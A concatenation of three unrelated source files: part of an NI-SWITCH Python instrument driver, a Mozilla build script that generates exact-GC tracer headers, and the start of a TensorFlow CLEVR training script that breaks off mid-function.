    error_code = self._library.niSwitch_GetChannelName(session_handle, index_arg, size_arg, name_buffer)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
    return name_buffer.value.decode(self._encoding)
@ivi_synchronized
def get_path(self, channel1, channel2):
    r'''get_path

    Returns a string that identifies the explicit path created with
    connect. Pass this string to set_path to establish the exact same path
    in future connections. When multiple paths exist between two channels,
    connect selects an available path with no guarantee it is always the
    same one; get_path only returns paths explicitly created by connect or
    set_path. For example, after connecting CH1-CH3 and then CH2-CH3, no
    explicit path exists between CH1 and CH2 and an error is returned.

    Args:
        channel1 (str): One endpoint of the desired path. Refer to Devices
            Overview for valid channel names (e.g. ch0, com0, ab0, r1, c2,
            cjtemp). Default value: ""
        channel2 (str): The other endpoint of the desired path. Same
            naming rules as channel1. Default value: ""

    Returns:
        path (str): Comma-separated paths between channel 1 and channel 2.
            The first and last names are the endpoints; all other channels
            are configuration channels. Examples: ch0->com0, com0->ab0
    '''
    session_handle = _visatype.ViSession(self._vi)
    ch1_buffer = ctypes.create_string_buffer(channel1.encode(self._encoding))
    ch2_buffer = ctypes.create_string_buffer(channel2.encode(self._encoding))
    # Sizing call: with a zero buffer size the return code carries the
    # required buffer length, so warnings are ignored here.
    size_arg = _visatype.ViInt32()
    error_code = self._library.niSwitch_GetPath(session_handle, ch1_buffer, ch2_buffer, size_arg, None)
    errors.handle_error(self, error_code, ignore_warnings=True, is_error_handling=False)
    # Fetch call: allocate the reported size and retrieve the path string.
    size_arg = _visatype.ViInt32(error_code)
    path_buffer = (_visatype.ViChar * size_arg.value)()
    error_code = self._library.niSwitch_GetPath(session_handle, ch1_buffer, ch2_buffer, size_arg, path_buffer)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
    return path_buffer.value.decode(self._encoding)
@ivi_synchronized
def get_relay_count(self, relay_name):
    r'''get_relay_count

    Returns the number of times the relay has changed from Closed to Open.
    Relay count is useful for tracking relay lifetime and usage. Call
    wait_for_debounce before get_relay_count to ensure an
    accurate count. Refer to the Relay Count topic in the NI Switches Help
    to determine if the switch module supports relay counting.

    Args:
        relay_name (str): Name of the relay. Default value: None Examples of valid relay names:
            ch0, ab0, 1wire, hlselect Refer to Devices Overview for a list of valid
            relay names for the switch module.

    Returns:
        relay_count (int): The number of relay cycles.
    '''
    vi_ctype = _visatype.ViSession(self._vi)  # case S110
    relay_name_ctype = ctypes.create_string_buffer(relay_name.encode(self._encoding))  # case C020
    relay_count_ctype = _visatype.ViInt32()  # case S220
    # relay_count_ctype is constructed just above and can never be None, so
    # the pointer is passed unconditionally (the former None-guard was dead code).
    error_code = self._library.niSwitch_GetRelayCount(vi_ctype, relay_name_ctype, ctypes.pointer(relay_count_ctype))
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
    return int(relay_count_ctype.value)
@ivi_synchronized
def get_relay_name(self, index):
    r'''get_relay_name

    Returns the relay name string that is in the relay list at the
    specified index. Use get_relay_name in a loop to get a complete list of
    valid relay names for the switch module; use the Number of Relays
    property to determine the number of relays.

    Args:
        index (int): A 1-based index into the channel table. Default
            value: 1. Maximum value: value of Channel Count property.

    Returns:
        relay_name_buffer (str): The relay name for the given index.
    '''
    session_handle = _visatype.ViSession(self._vi)
    index_arg = _visatype.ViInt32(index)
    # Sizing call: with a zero buffer size the return code carries the
    # required buffer length, so warnings are ignored here.
    size_arg = _visatype.ViInt32()
    error_code = self._library.niSwitch_GetRelayName(session_handle, index_arg, size_arg, None)
    errors.handle_error(self, error_code, ignore_warnings=True, is_error_handling=False)
    # Fetch call: allocate the reported size and retrieve the relay name.
    size_arg = _visatype.ViInt32(error_code)
    name_buffer = (_visatype.ViChar * size_arg.value)()
    error_code = self._library.niSwitch_GetRelayName(session_handle, index_arg, size_arg, name_buffer)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
    return name_buffer.value.decode(self._encoding)
@ivi_synchronized
def get_relay_position(self, relay_name):
    r'''get_relay_position

    Returns the relay position for the relay specified in the Relay Name
    parameter.

    Args:
        relay_name (str): Name of the relay. Default value: None Examples of valid relay names:
            ch0, ab0, 1wire, hlselect Refer to Devices Overview for a list of valid
            relay names for the switch module.

    Returns:
        relay_position (enums.RelayPosition): Indicates whether the relay is open or closed.
            RelayPosition.OPEN 10
            RelayPosition.CLOSED 11
    '''
    vi_ctype = _visatype.ViSession(self._vi)  # case S110
    relay_name_ctype = ctypes.create_string_buffer(relay_name.encode(self._encoding))  # case C020
    relay_position_ctype = _visatype.ViInt32()  # case S220
    # relay_position_ctype is constructed just above and can never be None, so
    # the pointer is passed unconditionally (the former None-guard was dead code).
    error_code = self._library.niSwitch_GetRelayPosition(vi_ctype, relay_name_ctype, ctypes.pointer(relay_position_ctype))
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
    return enums.RelayPosition(relay_position_ctype.value)
def _init_with_topology(self, resource_name, topology="Configured Topology", simulate=False, reset_device=False):
    r'''_init_with_topology

    Returns a session handle used to identify the switch in all subsequent
    instrument driver calls and sets the topology of the switch. Creates a
    new IVI instrument driver session for the switch specified in the
    resource_name parameter. The driver uses the topology specified in the
    topology parameter and overrides the topology specified in MAX.

    Note: When initializing an NI SwitchBlock device with topology, you
    must specify the topology created when you configured the device in
    MAX, using either NISWITCH_TOPOLOGY_CONFIGURED_TOPOLOGY or the topology
    string of the device. Refer to the Initializing with Topology for NI
    SwitchBlock Devices topic in the NI Switches Help for information about
    determining the topology string of an NI SwitchBlock device.

    By default, the switch is reset to a known state. Enable simulation by
    specifying the topology and setting the simulate parameter to True.

    Args:
        resource_name (str): Resource name of the switch module to
            initialize (e.g. an NI-DAQmx device name such as "SC1Mod3",
            "SCXI1::3", "PXI0::16"). IVI logical names are also valid.
            Default value: None
        topology (str): Topology name to use for the switch, or
            "Configured Topology" (NISWITCH_TOPOLOGY_CONFIGURED_TOPOLOGY)
            to use the last topology configured for the device in MAX.
            Refer to the NI Switches Help for the full list of valid
            NISWITCH_TOPOLOGY_* strings for each device.
            Default value: "Configured Topology"
        simulate (bool): Enables simulation of the switch module specified
            in the resource name parameter. Default value: False
        reset_device (bool): Specifies whether to reset the switch module
            during the initialization process. True - Reset Device
            (Default Value). False - Currently unsupported; the device
            will not reset.

    Returns:
        vi (int): A particular NI-SWITCH session used for all subsequent
            NI-SWITCH calls.
    '''
    resource_name_ctype = ctypes.create_string_buffer(resource_name.encode(self._encoding))  # case C020
    topology_ctype = ctypes.create_string_buffer(topology.encode(self._encoding))  # case C020
    simulate_ctype = _visatype.ViBoolean(simulate)  # case S150
    reset_device_ctype = _visatype.ViBoolean(reset_device)  # case S150
    vi_ctype = _visatype.ViSession()  # case S220
    # vi_ctype is constructed just above and can never be None, so the
    # pointer is passed unconditionally (the former None-guard was dead code).
    error_code = self._library.niSwitch_InitWithTopology(resource_name_ctype, topology_ctype, simulate_ctype, reset_device_ctype, ctypes.pointer(vi_ctype))
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
    return int(vi_ctype.value)
@ivi_synchronized
def _initiate_scan(self):
    r'''_initiate_scan

    Commits the configured scan list and trigger settings to hardware and
    initiates the scan. If niSwitch Commit was called earlier, this only
    initiates the scan and returns immediately. Once the scanning
    operation begins, you cannot perform any operation other than
    GetAttribute, AbortScan, or SendSoftwareTrigger; all other methods
    return NISWITCH_ERROR_SCAN_IN_PROGRESS. To stop the scanning
    operation, call abort.
    '''
    session_handle = _visatype.ViSession(self._vi)
    error_code = self._library.niSwitch_InitiateScan(session_handle)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
@ivi_synchronized
def relay_control(self, relay_name, relay_action):
    r'''relay_control

    Controls individual relays of the switch. When controlling individual
    relays, the protection offered by setting the usage of source channels
    and configuration channels, and by enabling or disabling analog bus
    sharing on the NI SwitchBlock, does not apply. Refer to the device book
    for your switch in the NI Switches Help to determine if the switch
    supports individual relay control.

    Args:
        relay_name (str): Name of the relay. Default value: None Examples of valid relay names:
            ch0, ab0, 1wire, hlselect Refer to Devices Overview for a list of valid
            relay names for the switch module.
        relay_action (enums.RelayAction): Specifies whether to open or close a given relay. Default value: Relay
            Close Defined values: RelayAction.OPEN
            RelayAction.CLOSE (Default Value)
    '''
    if type(relay_action) is not enums.RelayAction:
        # Fixed: the message previously named the wrong parameter ('mode').
        raise TypeError('Parameter relay_action must be of type ' + str(enums.RelayAction))
    vi_ctype = _visatype.ViSession(self._vi)  # case S110
    relay_name_ctype = ctypes.create_string_buffer(relay_name.encode(self._encoding))  # case C020
    relay_action_ctype = _visatype.ViInt32(relay_action.value)  # case S130
    error_code = self._library.niSwitch_RelayControl(vi_ctype, relay_name_ctype, relay_action_ctype)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
    return
@ivi_synchronized
def reset_with_defaults(self):
    r'''reset_with_defaults

    Resets the switch module and applies initial user specified settings
    from the logical name used to initialize the session. If the session
    was created without a logical name, this method is equivalent to reset.
    '''
    session_handle = _visatype.ViSession(self._vi)
    error_code = self._library.niSwitch_ResetWithDefaults(session_handle)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
@ivi_synchronized
def route_scan_advanced_output(self, scan_advanced_output_connector, scan_advanced_output_bus_line, invert=False):
    r'''route_scan_advanced_output

    Routes the scan advanced output trigger from a trigger bus line (TTLx)
    to the front or rear connector.

    Args:
        scan_advanced_output_connector (enums.ScanAdvancedOutput): The scan advanced trigger destination. Valid locations are the
            ScanAdvancedOutput.FRONTCONNECTOR and ScanAdvancedOutput.REARCONNECTOR. Default
            value: ScanAdvancedOutput.FRONTCONNECTOR

            Note:
            One or more of the referenced values are not in the Python API for this driver. Enums that only define values, or represent True/False, have been removed.
        scan_advanced_output_bus_line (enums.ScanAdvancedOutput): The trigger line to route the scan advanced output trigger from the
            front or rear connector. Select ScanAdvancedOutput.NONE to break an existing
            route. Default value: None Valid Values: ScanAdvancedOutput.NONE
            ScanAdvancedOutput.TTL0 ScanAdvancedOutput.TTL1 ScanAdvancedOutput.TTL2
            ScanAdvancedOutput.TTL3 ScanAdvancedOutput.TTL4 ScanAdvancedOutput.TTL5
            ScanAdvancedOutput.TTL6 ScanAdvancedOutput.TTL7

            Note:
            One or more of the referenced values are not in the Python API for this driver. Enums that only define values, or represent True/False, have been removed.
        invert (bool): If True, inverts the input trigger signal from falling to rising or
            vice versa. Default value: False
    '''
    if type(scan_advanced_output_connector) is not enums.ScanAdvancedOutput:
        # Fixed: the message previously named the wrong parameter ('mode').
        raise TypeError('Parameter scan_advanced_output_connector must be of type ' + str(enums.ScanAdvancedOutput))
    if type(scan_advanced_output_bus_line) is not enums.ScanAdvancedOutput:
        # Fixed: the message previously named the wrong parameter ('mode').
        raise TypeError('Parameter scan_advanced_output_bus_line must be of type ' + str(enums.ScanAdvancedOutput))
    vi_ctype = _visatype.ViSession(self._vi)  # case S110
    scan_advanced_output_connector_ctype = _visatype.ViInt32(scan_advanced_output_connector.value)  # case S130
    scan_advanced_output_bus_line_ctype = _visatype.ViInt32(scan_advanced_output_bus_line.value)  # case S130
    invert_ctype = _visatype.ViBoolean(invert)  # case S150
    error_code = self._library.niSwitch_RouteScanAdvancedOutput(vi_ctype, scan_advanced_output_connector_ctype, scan_advanced_output_bus_line_ctype, invert_ctype)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
    return
@ivi_synchronized
def route_trigger_input(self, trigger_input_connector, trigger_input_bus_line, invert=False):
    r'''route_trigger_input

    Routes the input trigger from the front or rear connector to a trigger
    bus line (TTLx). To disconnect the route, call this method again and
    specify None for trigger bus line parameter.

    Args:
        trigger_input_connector (enums.TriggerInput): The location of the input trigger source on
            the switch module. Valid locations are TriggerInput.FRONTCONNECTOR and
            TriggerInput.REARCONNECTOR. Default value: TriggerInput.FRONTCONNECTOR

        trigger_input_bus_line (enums.TriggerInput): The trigger line to route the input trigger.
            Select the NONE value to break an existing route. Valid values:
            TriggerInput.TTL0 through TriggerInput.TTL7.

        invert (bool): If True, inverts the input trigger signal from falling to rising or
            vice versa. Default value: False
    '''
    # Fix: the original error messages were copy-pasted and referred to a
    # non-existent parameter named 'mode'; name the actual parameter instead.
    if type(trigger_input_connector) is not enums.TriggerInput:
        raise TypeError('Parameter trigger_input_connector must be of type ' + str(enums.TriggerInput))
    if type(trigger_input_bus_line) is not enums.TriggerInput:
        raise TypeError('Parameter trigger_input_bus_line must be of type ' + str(enums.TriggerInput))
    vi_ctype = _visatype.ViSession(self._vi)  # case S110
    trigger_input_connector_ctype = _visatype.ViInt32(trigger_input_connector.value)  # case S130
    trigger_input_bus_line_ctype = _visatype.ViInt32(trigger_input_bus_line.value)  # case S130
    invert_ctype = _visatype.ViBoolean(invert)  # case S150
    error_code = self._library.niSwitch_RouteTriggerInput(vi_ctype, trigger_input_connector_ctype, trigger_input_bus_line_ctype, invert_ctype)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
    return
@ivi_synchronized
def send_software_trigger(self):
    r'''send_software_trigger

    Sends a software trigger to the switch module associated with this
    NI-SWITCH session. When the trigger input is set to
    TriggerInput.SOFTWARE_TRIG (via ConfigureScanTrigger or the
    trigger_input property), a scan paused at a semi-colon
    (wait for trigger) resumes only after this call.

    Note:
    One or more of the referenced methods are not in the Python API for this driver.
    '''
    session_handle = _visatype.ViSession(self._vi)
    status = self._library.niSwitch_SendSoftwareTrigger(session_handle)
    errors.handle_error(self, status, ignore_warnings=False, is_error_handling=False)
    return None
@ivi_synchronized
def set_path(self, path_list):
    r'''set_path

    Connects two channels by specifying an explicit path in the path list
    parameter. Useful where path repeatability matters, such as in
    calibrated signal paths; otherwise use connect.

    Args:
        path_list (str): Comma-separated paths between channel 1 and channel 2.
            The first and last names in the path are the endpoints; every other
            channel is a configuration channel. Example: 'ch0->com0, com0->ab0'
            (com0 is a configuration channel). Obtain the path list for a
            previously created path with get_path.
    '''
    session_handle = _visatype.ViSession(self._vi)
    # The C API expects a NUL-terminated byte buffer in the session encoding.
    path_buffer = ctypes.create_string_buffer(path_list.encode(self._encoding))
    status = self._library.niSwitch_SetPath(session_handle, path_buffer)
    errors.handle_error(self, status, ignore_warnings=False, is_error_handling=False)
    return None
@ivi_synchronized
def wait_for_debounce(self, maximum_time_ms=datetime.timedelta(milliseconds=5000)):
    r'''wait_for_debounce

    Pauses until all created paths have settled. If the maximum time elapses
    before the switch paths have settled, this method raises the
    NISWITCH_ERROR_MAX_TIME_EXCEEDED error.

    Args:
        maximum_time_ms (float in seconds or datetime.timedelta): Maximum length
            of time to wait for all relays in the switch module to activate or
            deactivate; a timeout error is returned if it elapses first.
            Default Value: 5000 ms
    '''
    session_handle = _visatype.ViSession(self._vi)
    # Accepts either seconds (float) or a timedelta; converted to whole ms.
    timeout_ctype = _converters.convert_timedelta_to_milliseconds(maximum_time_ms, _visatype.ViInt32)
    status = self._library.niSwitch_WaitForDebounce(session_handle, timeout_ctype)
    errors.handle_error(self, status, ignore_warnings=False, is_error_handling=False)
    return None
@ivi_synchronized
def wait_for_scan_complete(self, maximum_time_ms=datetime.timedelta(milliseconds=5000)):
    r'''wait_for_scan_complete

    Pauses until the switch module stops scanning, or raises the
    NISWITCH_ERROR_MAX_TIME_EXCEEDED error if the maximum time elapses
    before the scanning operation has finished.

    Args:
        maximum_time_ms (float in seconds or datetime.timedelta): Maximum length
            of time to wait for the switch module to stop scanning; the
            NISWITCH_ERROR_MAX_TIME_EXCEEDED error is returned if it elapses
            first. Default Value: 5000 ms
    '''
    session_handle = _visatype.ViSession(self._vi)
    # Accepts either seconds (float) or a timedelta; converted to whole ms.
    timeout_ctype = _converters.convert_timedelta_to_milliseconds(maximum_time_ms, _visatype.ViInt32)
    status = self._library.niSwitch_WaitForScanComplete(session_handle, timeout_ctype)
    errors.handle_error(self, status, ignore_warnings=False, is_error_handling=False)
    return None
def _close(self):
    r'''_close

    Terminates the NI-SWITCH session, tears down its properties, and frees
    any memory resources the driver uses. Notes: (1) the session must be
    unlocked before calling _close; (2) after _close, the driver cannot be
    used again until init or InitWithOptions is called.

    Note:
    One or more of the referenced methods are not in the Python API for this driver.
    '''
    session_handle = _visatype.ViSession(self._vi)
    status = self._library.niSwitch_close(session_handle)
    errors.handle_error(self, status, ignore_warnings=False, is_error_handling=False)
    return None
@ivi_synchronized
def self_test(self):
    '''self_test

    Verifies that the driver can communicate with the switch module.
    Raises `SelfTestError` on self test failure. Properties on exception object:

    - code - failure code from driver
    - message - status message from driver

    +----------------+------------------+
    | Self-Test Code | Description      |
    +================+==================+
    | 0              | Passed self-test |
    +----------------+------------------+
    | 1              | Self-test failed |
    +----------------+------------------+
    '''
    result_code, result_message = self._self_test()
    # A zero code means the self test passed; anything else is a failure.
    if result_code:
        raise errors.SelfTestError(result_code, result_message)
    return None
@ivi_synchronized
def reset(self):
    r'''reset

    Disconnects all created paths and returns the switch module to its
    state at initialization. Configuration channel and source channel
    settings remain unchanged.
    '''
    session_handle = _visatype.ViSession(self._vi)
    status = self._library.niSwitch_reset(session_handle)
    errors.handle_error(self, status, ignore_warnings=False, is_error_handling=False)
    return None
@ivi_synchronized
def _self_test(self):
    r'''_self_test

    Verifies that the driver can communicate with the switch module.

    Returns:
        self_test_result (int): Value returned from the switch device
            self-test. Passed = 0, Failed = 1.
        self_test_message (str): Self-test response string from the switch
            device; the driver writes up to 256 bytes into the buffer.
    '''
    vi_ctype = _visatype.ViSession(self._vi)  # case S110
    self_test_result_ctype = _visatype.ViInt16()  # case S220
    self_test_message_ctype = (_visatype.ViChar * 256)()  # case C070
    # self_test_result_ctype is always constructed above, so the original
    # 'None if ... is None else pointer(...)' guard was dead code; pass the
    # pointer directly.
    error_code = self._library.niSwitch_self_test(vi_ctype, ctypes.pointer(self_test_result_ctype), self_test_message_ctype)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
    return int(self_test_result_ctype.value), self_test_message_ctype.value.decode(self._encoding)
|
#!/usr/bin/env python
# -*- Mode: Python; c-basic-offset: 4; indent-tabs-mode: nil; tab-width: 4 -*-
# vi: set ts=4 sw=4 expandtab:
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
# This is a wrapper script around the exactgc script. Usage:
# Env:
# The AVM env var must point to an avmshell
# The ASC env var must point to asc.jar
# Invocation:
# The script exports one function "GenerateTracers" with these arguments:
# prefix = module specific prefix string used in generated file names, ie "avmplus", "avmglue"
# inputfiles = string of list of files, can contain wildcards
# outputdir = where output files go
import os
import shutil
import sys
import filecmp
import glob
import tempfile
import platform
import subprocess
import string
def platform_filename(filename):
    """Return *filename* as an absolute path in the platform's native form.

    On cygwin the path is converted to a mixed-mode Windows path via
    `cygpath -m`; elsewhere it is just the absolute path. Trailing
    whitespace (the newline emitted by cygpath) is stripped.
    """
    filename = os.path.abspath(filename)
    if sys.platform.startswith("cygwin"):
        from subprocess import Popen
        from subprocess import PIPE
        retval = Popen(["/usr/bin/cygpath", "-m", filename], stdout=PIPE).communicate()[0]
    else:
        retval = filename
    # Fix: use the string method instead of string.rstrip(), which is
    # deprecated in Python 2 and removed in Python 3; behavior is identical.
    return retval.rstrip()


# Directory containing this script, in platform-native form; used to locate
# exactgc.as/.abc and the sibling core/shell source trees.
utilsdir = platform_filename(os.path.dirname(__file__))
def gen(prefix,inputfiles,outputdir,srcdir=os.getcwd(),ns=''):
    """Run the exactgc script over *inputfiles* and install generated tracers.

    Args:
        prefix: module-specific prefix for generated file names, e.g. "avmplus".
        inputfiles: whitespace-separated file list; entries may contain wildcards.
        outputdir: directory where the generated headers are copied.
        srcdir: directory the input file globs are resolved against (the
            function chdirs here while running; restored afterwards).
        ns: optional namespace passed to exactgc via -ns; '' means default.

    Exits the process with status 1 on any failure (missing env vars, exactgc
    failure, or missing generated output).
    """
    # The AVM env var must point to an avmshell executable.
    avm = os.environ.get('AVM')
    if avm == None:
        print "ERROR: AVM environment variable must point to avm executable"
        exit(1)
    asfile = utilsdir + "/exactgc.as"
    abcfile = utilsdir + "/exactgc.abc"
    # note this script tries not to rely on CWD but compiling exactgc.as does.
    # Recompile exactgc.abc only when it is stale and writable.
    if not os.path.exists(abcfile) or (os.path.getmtime(abcfile) < os.path.getmtime(asfile) and os.access(abcfile, os.W_OK)):
        classpath = os.environ.get('ASC')
        if classpath == None:
            print "ERROR: ASC environment variable must point to asc.jar"
            exit(1)
        print("Compiling exactgc script...")
        java_home = os.environ.get('JAVA_HOME')
        if java_home == None:
            print "warning: no JAVA_HOME set; inferring executable is 'java' and on system path."
            java_bin = 'java'
        else:
            java_bin = os.path.join(java_home, "bin", "java")
        # "java_bin" because path may have spaces, parentheses, etc (Windows).
        os.system("\"%s\" -jar %s -AS3 -import %s/../generated/builtin.abc -import %s/../generated/shell_toplevel.abc -debug %s" % (java_bin, classpath, utilsdir, utilsdir, asfile))
    # in case outputdir is relative make it absolute before chdir'ing
    outputdir = os.path.abspath(outputdir)
    print("Generating "+prefix+" exact gc generated code into " + outputdir)
    savedir = os.getcwd()
    os.chdir(srcdir)
    # expand wildcards in input file list
    filelist = '\n'.join([y for x in map(glob.glob, inputfiles.split()) for y in x])
    # don't bother trying to pass via os.system, dump into a tmp file
    # for windows we need a new python API to keep the file around ater closing, which
    # we must do in order for the exact gc script to open it.
    oldpy = sys.version_info < (2,6)
    if oldpy and platform.system() == 'Windows':
        print "Error: exactgc script requirets newer python on windows."
        exit(1)
    # delete=False (2.6+) keeps the file on disk after close so the avmshell
    # child process can open it; on old Pythons we flush and keep it open.
    if oldpy:
        tmpfile = tempfile.NamedTemporaryFile()
    else:
        tmpfile = tempfile.NamedTemporaryFile(delete = False)
    tmpfile.write(filelist)
    # close deletes in old world
    if not oldpy:
        tmpfile.close()
    else:
        tmpfile.flush()
    # leave off -ns arg if default namespace
    if ns != '':
        ns = '-ns ' + ns
    # The '@file' argument tells exactgc to read its input list from the tmp file.
    exactgccmd = '%s %s -- -b %s-tracers.hh -n %s-tracers.hh -i %s-tracers.h %s %s' % (avm, abcfile, prefix, prefix, prefix, ns, '@'+platform_filename(tmpfile.name))
    ret = os.system(exactgccmd)
    # Clean up the tmp file: close (auto-deletes) on old Python, unlink otherwise.
    if oldpy:
        tmpfile.close()
    else:
        os.unlink(tmpfile.name)
    success = True
    if ret != 0:
        print "Invoking avmshell on exactgc script failed with command:", exactgccmd
        success = False
    tmpfile.close()
    if not os.path.exists(prefix+'-tracers.hh'):
        print "Error: failed to generate tracers"
        success = False
    elif not os.path.exists(outputdir):
        os.makedirs(outputdir)
    # copy changed headers stuff to output dir
    for src in [prefix+'-tracers.hh', prefix+'-tracers.h']:
        target = outputdir + "/" + src
        # delete target file in case of error
        if not success:
            if os.path.exists(target):
                os.remove(target)
        else:
            # Only replace the target when contents changed, to keep
            # timestamps stable for incremental builds.
            if not os.path.exists(target) or not filecmp.cmp(target,src):
                shutil.move(src,target)
            else:
                os.remove(src)
    os.chdir(savedir)
    if not success:
        exit(1)
def gen_builtins(outdir):
    """Generate the avmplus tracers from the core VM sources into *outdir*."""
    core_src = utilsdir + "/../core/"
    gen(prefix='avmplus', inputfiles='*.h *.as', outputdir=outdir, srcdir=core_src, ns='avmplus')
def gen_shell(outdir):
    """Generate the avmshell and extensions tracers into *outdir*.

    Both runs resolve their input globs against the shell source directory.
    """
    shell_src = utilsdir + "/../shell/"
    gen(prefix='avmshell', inputfiles='shell_toplevel.as DebugCLI.h ShellCore.h SystemClass.h', outputdir=outdir, srcdir=shell_src, ns='avmshell')
    gen(prefix='extensions', inputfiles='DomainClass.h Domain.as ../extensions/*.h ../extensions/*.as', outputdir=outdir, srcdir=shell_src, ns='avmplus')
|
<reponame>rdh1115/cog
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import itertools
import os
import random
import sys
import time
import tensorflow as tf
from tensorflow.core.framework import summary_pb2
import clevr.data_generator as clevr
import clevr.constants as constants
import model.network as network
# Command-line flags (TF1 tf.app.flags).
# Hyperparameter overrides, e.g. --hparams="learning_rate=0.001,n_rnn=256".
tf.app.flags.DEFINE_string(
    'hparams', '', 'Comma separated list of name=value hyperparameter pairs.')
# When set, the script runs inference on the test set instead of training.
tf.app.flags.DEFINE_string(
    'clevr_test_output', None,
    'If set to a path, generates and write test answers for CLEVR dataset '
    'into <clevr_test_output>.txt and <clevr_test_output>_with_ids.txt. '
    'Test tf records are expected to be in <data_dir>. '
    'Latest checkpoint is loaded from <train_dir>/checkpoints.')

# Training parameters
# task_family flag inherited from task_bank.py
tf.app.flags.DEFINE_integer('num_steps', 100000, 'number of training steps')
tf.app.flags.DEFINE_integer('display_step', 10, 'display every # steps')
tf.app.flags.DEFINE_integer('summary_step', 500, 'log summaries every # steps')
tf.app.flags.DEFINE_integer('batch_size', 250, 'batch size for training')

# Logistics
tf.app.flags.DEFINE_string('data_dir', '/tmp/clevr/tfrecord',
                           'Directory of training and validation data.')
tf.app.flags.DEFINE_string('train_dir', '/tmp/clevr/train',
                           'Directory to put the training logs.')
tf.app.flags.DEFINE_boolean('report_param_stat', False,
                            'If true, report parameter statistics')

# Parsed flag values; attributes are resolved lazily on first access.
FLAGS = tf.app.flags.FLAGS
def get_default_hparams_dict():
    """Return the default hyperparameters as a plain dict.

    Every value here can be overridden from the command line through the
    --hparams flag (comma-separated name=value pairs).
    """
    defaults = {
        # --- optimization ---
        # learning rate decay: lr multiplier per 1M examples
        # (0.966 translates to roughly 0.5 per 20M examples)
        'lr_decay': 1.0,
        'learning_rate': 0.0005,
        # gradient clipping
        'grad_clip': 80.,
        # clipping value for rnn state norm
        'rnn_state_norm_clip': 5000.,
        'optimizer': 'adam',
        'adam_beta1': 0.1,
        'adam_beta2': 0.0001,
        'adam_epsilon': 1e-8,
        # L2 regularization; consider a value between 1e-4 and 1e-5
        'l2_weight': 2*1e-5,
        # --- core recurrent controller ---
        'n_rnn': 512,
        'rnn_type': 'gru',
        # train initial state or not
        'train_init': True,
        # 'factor' param of variance_scaling_initializer for the controller
        # GRU kernel initializer
        'controller_gru_init_factor': 1.0,
        # --- vision network ---
        'use_img_size_128': False,
        'n_out_vis': 128,
        'use_vgg_pretrain': False,
        # normalize images to mean 0 / std 1
        'normalize_images': False,
        # --- question (rule) network ---
        'n_rnn_rule': 128,
        'rnn_rule_type': 'lstm',
        'embedding_size': 64,
        'rnn_rule_bidir': True,
        # --- attention and memory ---
        # number of time points to repeat for each epoch
        'n_time_repeat': 8,
        'feature_attention': True,
        'state_dep_feature_attention': False,
        'feature_attention_use_mlp': False,
        # apply feature attention to the second-to-last conv layer
        'feature_attend_to_2conv': True,
        # feed a spatially-summed visual input to the core
        'feed_space_sum_to_core': True,
        'spatial_attention': True,
        'memory_dep_spatial_attention': False,
        'feed_spatial_attn_back': True,
        # how rule outputs are used as memory
        'verbal_attention': True,
        'memory_query_size': 128,
        # number of maps in visual spatial memory
        'vis_memory_maps': 0,
        # only use visual memory for the point short-cut
        'only_vis_to_pnt': True,
        # --- epochs and readout ---
        'n_epoch': 1,
        'signal_new_epoch': False,
        # final readout using a MLP
        'final_mlp': False,
    }
    return defaults
def run_test(train_dir, test_output_dir, hparams):
    """Run the trained model on the CLEVR test set and write the answers.

    Args:
        train_dir: directory containing a 'checkpoints' subdirectory; the
            latest checkpoint is restored from there.
        test_output_dir: directory where 'clevr_test.txt' and
            'clevr_test_with_ids.txt' are written.
        hparams: HParams used to build the network.

    Raises:
        RuntimeError: if no checkpoint is found under train_dir.
    """
    print("\nRUNNING MODEL ON THE TEST SET\n")
    tf.reset_default_graph()
    ######################### Read the data ################################
    data = clevr.data_from_tfrecord(FLAGS.data_dir, 'test', batch_size=250,
                                    hparams=hparams, is_training=False)
    ######################### Build the network ################################
    tf.train.get_or_create_global_step()
    model = network.Model(hparams, constants.config)
    model.build(data, batch_size=FLAGS.batch_size, is_training=True)
    model_answers = tf.argmax(model.out_word_net, -1)
    q_idx = data['question_index']
    saver = tf.train.Saver()
    checkpoint_path = train_dir + '/checkpoints'
    with tf.Session() as sess:
        cpkt_path = tf.train.latest_checkpoint(checkpoint_path)
        if cpkt_path is not None:
            print("Restoring model from: " + cpkt_path)
            saver.restore(sess, cpkt_path)
            print("Done restoring model")
        else:
            raise RuntimeError("Failed to find latest checkpoint in: " +
                               checkpoint_path)
        global_step = sess.run(tf.train.get_global_step())
        print("Global step value loaded from checkpoint: " + str(global_step))
        ans = {}
        # Iterate until the input pipeline is exhausted (OutOfRangeError).
        for i in itertools.count():
            if i % 100 == 0:
                print('Processing batch', i)
            try:
                m_ans, q_idx_ = sess.run([model_answers, q_idx])
                for m, q in zip(m_ans, q_idx_):
                    ans[q] = constants.OUTPUTVOCABULARY[m]
            except tf.errors.OutOfRangeError:
                print("Done processing test dataset. Saving results")
                break
    # Fix: dict.items() returns a view in Python 3 with no .sort(); sorted()
    # is equivalent in Python 2 and portable.
    items = sorted(ans.items())
    with_ids = os.path.join(test_output_dir, 'clevr_test_with_ids.txt')
    without_ids = os.path.join(test_output_dir, 'clevr_test.txt')
    with tf.gfile.FastGFile(with_ids, 'w') as f:
        f.write('\n'.join(map(lambda x: '%d %s' % x, items)))
    with tf.gfile.FastGFile(without_ids, 'w') as f:
